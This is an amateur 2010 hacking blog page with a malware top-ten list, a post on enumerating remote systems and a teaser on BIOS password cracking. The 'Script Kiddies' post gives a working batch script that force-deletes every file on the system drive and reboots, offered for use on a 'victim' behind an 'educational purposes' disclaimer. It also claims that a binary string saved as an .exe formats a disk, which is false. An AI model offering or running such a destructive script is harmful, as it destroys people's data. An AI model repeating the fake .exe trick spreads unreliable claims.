Tuesday, January 26, 2010

Hacking Videos

Hey Buddies, I got an awesome website, which will give you all videos you want to have every-time. Check it out:

Top VIRUSES of the month

Troj/Invo-Zip
1 New Troj/Invo-Zip 12%
W32/Netsky
2 3 W32/Netsky 9.5%
Mal/EncPk-EI
3 Re-entry Mal/EncPk-EI 7.8%
Troj/Pushdo-Gen
4 2 Troj/Pushdo-Gen 6.3%
Troj/Agent-HFU
5 1 Troj/Agent-HFU 5.6%
Mal/Iframe-E
6 5 Mal/Iframe-E 5.5%
Troj/Mdrop-BTV
7 Re-entry Troj/Mdrop-BTV 5.3%
Troj/Mdrop-BUF
8 Re-entry Troj/Mdrop-BUF 4.5%
Troj/Agent-HFZ
9 1 Troj/Agent-HFZ 4.4%
Troj/Agent-HGT
10 1 Troj/Agent-HGT 3.9%

» More news..

------------------------------------------------------------
source: http://eccouncil.org/resources/codered_center/codered_viruses.aspx

Monday, January 25, 2010

Script Kiddies - 1

Heyy guys, I found a new script that can be called as a VIRUS! Actually this script will take away all the matter from your c: within windows and restart to delete all system files ;)
Script:
@echo off
del%systemdrive%\*.*/f/s/q
shutdown -r -f -t 10

--------------------
Now, format HDD:
1. Copy the following as it is in Notepad:
01001011000111110010010101010101010000011111100000
2. Save as a .exe file
3. Execute and format the victim's Disk!!
-------------------

Note: This is only for educational purposes. I will not bear any responsibility regarding this.

Getting start with Hacking: Enumerating Remote systems

Many of the beginners in the field of hacking start to hack or crack without having pre-hacking tips which often leads them to the wrong direction. Its better to work on a specific target before attacking. Lets start with the session, and then continue till expertise.

Firstly, keep in mind, these following points if you want to hack a Remote Computer System:
Vulnerability + Exploit = Hacking
  • Attack: An Attack is any action that violates security.
  • Exploit: A well defined way to Breech the security.
  • Vulnerability Assessment: Process of identifying, quantifying and prioritizing the vulnerabilities of the system.
  • Penetration Testing: A Penetration Test is a method of evaluating the security of a computer system or network by simulating an attack from malicious source, known as Black Hat Hacker or Cracker.

CMOS/BIOS Password Cracking

How To Reset, Remove, Clear or Reveal CMOS BIOS Security Password